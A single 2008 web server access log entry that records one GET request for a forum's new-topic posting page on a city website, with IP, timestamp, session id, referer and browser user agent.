84.16.230.111 - - [15/Nov/2008:05:02:01 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=35b2e185a3b6bd80c7ca42dea24ff8bb HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=35b2e185a3b6bd80c7ca42dea24ff8bb" "Opera/8.01 (Windows NT 5.1)" "www.sancarloscity.org"
